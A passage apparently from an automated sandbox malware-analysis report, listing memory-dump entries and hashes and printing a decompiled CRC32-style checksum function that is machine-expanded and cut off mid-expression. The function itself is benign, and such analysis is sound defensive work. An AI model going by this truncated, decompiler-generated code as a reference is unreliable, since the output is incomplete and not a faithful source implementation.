Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39bb7c4b20325c44dd8699449145d0d2bc85238f2d0020d1ee85a7bd7e705017
Instruction ID: 9637f4fcf05056c634a246d4ec164b1eccd92df816b65a9601eba7856632ad8a
Opcode Fuzzy Hash: 39bb7c4b20325c44dd8699449145d0d2bc85238f2d0020d1ee85a7bd7e705017
Instruction Fuzzy Hash: 36D1F5B1A002199FDF14CFA9D9805EDBBB1FF88314F25826AD959B7390D734AA41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0040541F Relevance: .1, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040541F(signed int _a4, signed char* _a8, unsigned int _a12) {
				signed int _t35;
				signed char* _t73;
				signed char* _t74;
				signed char* _t75;
				signed char* _t76;
				signed char* _t77;
				signed char* _t78;
				signed char* _t79;
				unsigned int _t85;

				_t73 = _a8;
				if(_t73 != 0) {
					_t35 =  !_a4;
					if(_a12 >= 8) {
						_t85 = _a12 >> 3;
						do {
							_a12 = _a12 - 8;
							_t74 =  &(_t73[1]);
							_t75 =  &(_t74[1]);
							_t76 =  &(_t75[1]);
							_t77 =  &(_t76[1]);
							_t78 =  &(_t77[1]);
							_t79 =  &(_t78[1]);
							_t35 = ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t78[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008 ^  *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t78[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 